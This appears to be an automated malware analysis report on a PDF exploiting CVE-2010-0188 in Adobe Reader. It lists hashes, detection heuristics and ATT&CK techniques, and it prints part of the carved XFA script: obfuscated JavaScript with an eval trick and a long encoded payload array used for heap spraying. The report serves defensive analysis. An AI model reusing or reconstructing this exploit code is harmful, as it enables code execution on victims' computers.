Malicious PDF — malware analysis report

Static analysis result for SHA-256 605467c7f4a9c729…

MALICIOUS

PDF

13.0 KB
MD5: 372a4416e6e4d6b67976300017d57011 SHA-1: 0fefe76b1306249913434bbe474917222da39b5c SHA-256: 605467c7f4a9c729dd9b0960eec59aa9c2186dd3d9e9fe3c5923cfca3c172949
352 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains XFA (XML Forms Architecture) content that triggers a heap spray exploit targeting CVE-2010-0188 in Adobe Reader. The embedded JavaScript is obfuscated but is designed to execute malicious code, likely leading to the download and execution of a second-stage payload. The ML classifier and ClamAV detection strongly indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Adobe Reader LibTIFF XFA image exploit — CVE-2010-0188 critical CVE likely CVE_2010_0188
    PDF contains the CVE-2010-0188 exploit template: XFA JavaScript heap-spray setup, a generated TIFF image payload, and assignment of that TIFF data to an XFA image field rawValue to trigger Adobe Reader's LibTIFF parser.
  • XFA form contains risky executable script high CVE related PDF_XFA_SCRIPT
    PDF embeds an XFA form whose script block contains exploit, submission/launch, or shell-execution primitives. Ordinary LiveCycle print/update scripts are left as generic XFA/JS signals unless stronger behavior is present.
  • ClamAV: Pdf.Exploit.Agent-36755 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36755
  • XFA JavaScript heap-spray exploit code critical PDF_XFA_HEAP_SPRAY
    PDF contains XFA script content with heap-spray or shellcode-like JavaScript markers such as large encoded word sequences, util.pack, large arrays, or spray variable names. This is a weaponised Adobe Reader exploit pattern, not a normal interactive form.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded script payload in PDF stream low PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • AcroForm button with action trigger low PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xdp/ In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.5In PDF document text
    • http://www.xfa.org/schema/xfa-data/1.0In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_pdf_script_000003e2.bin
1fc821c7f23a774a99b550d21e8dda643e46e3fb8cc5c3d11bb886e451c7ca9c		 pdf-embedded-script PDF raw stream script payload at offset 0x3E2 12238 bytes
Preview script
First 1,000 lines of the extracted script
<xdp:xdp xmlns:xdp='http://ns.adobe.com/xdp/'>
<asd/>as<config><asd/>
<present>
<pdf
>
<int>0</int>
<interactive>&#000049;</interactive>
a
<asd/>a<version>
1.5</version>
a<asd/>
</pdf>
</present>
<asd/></config><asd/>
<template xmlns='http://www.xfa.org/schema/xfa-template/2.5'>
<asd/>
a<subform name="a1">		<pageSet>
			<pageArea id="roteYom" name="roteYom">
				<contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
				<medium long="792pt" short="612pt" stock="default"/>
			</pageArea>
		</pageSet>
<asd/>a
		<subform name='v236536b346b'>
		a<asd/>a<field name='qwe123b'>a<asd/>a<event asd='wqr' activity='initialize'>
a<asd></asd><script
contentType='application/x-javascript'>

m=1-1;
cc="A +wL1/U;?Cu64^yed[Y(tiVb%]=BEjqfl-IxnK:*h}0R),{8Q59WSm3Fgoca.&lt;MsvDp2k'r\"_7";
x='efv5';
q=x[0]+'val';
a=(Number+Number).substr(2,3);
aa=([].sort+[].sort).substr(2,3);
if (a===aa){
t='214124';
e=t['indexOf'];
&#000119;=e(12)[q];
s=new Array();
ss='split';
ar='65@60@71@1@67@60@17@17@22@37@57@8@65@60@71@1@24@24@24@46@1@59@59@59@46@1@17@17@17@46@1@16@16@16@46@1@32@32@32@46@1@57@57@57@46@1@41@41@41@8@65@60@71@1@67@58@22@37@21@16@71@64@73@60@46@1@22@8@65@60@71@1@36@1@27@1@37@16@3@1@0@71@71@60@15@20@45@8@65@60@71@1@15@1@27@1@37@16@3@1@0@71@71@60@15@20@45@8@65@60@71@1@73@33@5@27@72@13@59@68@43@12@43@43@32@43@50@5@74@48@43@13@60@55@59@68@43@12@43@43@32@43@32@12@55@48@43@13@60@60@55@16@24@48@43@13@60@55@43@68@43@48@68@13@60@12@16@68@32@48@43@13@60@13@5@13@5@13@5@13@5@68@12@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@5@68@55@51@48@43@13@60@12@13@68@43@12@43@43@32@43@43@43@13@43@43@43@43@13@5@13@5@13@5@13@5@13@5@13@5@13@5@13@5@12@12@48@55@16@13@32@59@32@59@48@50@16@13@74@50@55@13@16@51@50@32@55@55@59@43@12@13@48@24@13@43@55@43@48@24@13@43@43@59@48@24@74@43@5@59@50@12@48@24@74@12@43@48@55@55@17@24@12@12@48@24@50@16@55@59@43@55@74@13@55@55@68@59@48@5@16@16@5@50@5@43@32@32@32@32@24@48@48@24@13@43@55@43@59@55@13@12@55@51@43@12@74@50@32@24@48@74@55@13@68@13@48@50@16@13@74@50@50@5@16@51@16@24@13@59@50@5@50@12@48@24@74@50@55@59@48@24@74@13@55@50@74@48@43@55@32@50@50@12@48@24@74@12@68@43@43@55@32@50@55@55@59@51@13@51@13@5@32@59@60@17@43@55@59@50@55@55@17@24@43@32@24@16@5@43@55@48@32@68@74@13@43@48@59@5@59@24@43@17@43@55@17@60@13@43@16@24@32@5@55@24@5@32@74@50@16@12@50@16@48@24@50@16@68@13@43@55@17@17@12@12@48@24@43@59@13@24@48@17@13@12@16@59@32@32@50@13@68@13@43@59@48@24@17@48@43@55@17@17@48@24@43@13@48@24@43@55@59@50@60@24@50@16@50@51@59@55@16@24@50@55@60@17@48@24@12@48@68@43@48@43@74@17@43@59@55@55@74@13@43@55@51@12@16@24@32@55@48@24@12@48@43@48@48@24@32@74@12@60@43@50@50@51@16@48@51@48@32@32@32@32@32@32@16@68@32@51@16@48@43@43@43@43@43@43@43@43@50@48@50@43@12@60@13@43@12@48@32@32@43@43@43@43@43@43@50@43@48@55@59@43@5@51@50@43@50@50@48@24@16@59@48@24@50@16@5@43@48@55@59@55@43@50@32@32@16@55@12@48@12@32@12@16@43@43@43@43@12@48@74@50@74@68@12@59@12@17@50@13@32@32@5@12@48@55@59@13@43@48@48@24@16@48@16@48@12@5@32@32@32@32@32@32@16@24@43@68@16@24@74@68@48@5@16@59@43@13@43@5@43@43@43@43@48@17@50@59@68@13@43@59@59@74@43@13@68@13@74@68@12@50@12@74@74@55@59@74@13@13@68@13@43@13@74@12@74@68@55@55@55@68@59@74@13@13@68@13@43@48@68@43@68@17@74@55@68@43@50@55@12@48@32@48@43@43@43@43@43@43@32@32@50@12@43@59@48@24@16@48@55@55@59@51@50@5@59@74@13@13@5@17@43@43@74@74@74@43@12@68@74@13@59@74@13@13@5@17@43@50@68@16@12@13@12@59@12@59@59@12@13@13@5@17@43@51@43@43@50@51@48@60@59@5@43@13@55@43@48@48@13@13@5@17@43@13@13@5@50@5@12@60@43@43@12@60@43@43@50@55@50@74@12@60@43@43@32@32@50@12@5@13@48@50@59@43@74@50@5@12@12@60@43@43@50@55@32@32@50@12@43@13@12@60@43@43@48@55@16@24@43@59@50@55@32@32@50@12@43@13@48@55@59@55@43@59@16@24@43@68@16@24@5@55@13@74@48@43@55@32@43@43@74@50@32@60@13@74@48@43@55@32@43@43@74@50@59@13@12@60@43@43@12@60@32@16@32@32@50@12@43@48@16@48@51@59@32@16@32@32@32@32@48@16@13@16@43@16@16@59@51@48@32@16@48@60@43@16@48@51@12@32@43@5@24@17@55@55@59@60@48@60@50@24@5@24@59@12@13@12@74@51@55@12@5@60@68@32@74@43@12@48@74@13@74@13@74@43@55@60@68@32@68@32@55@74@55@51@68@16@55@5@55@5
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.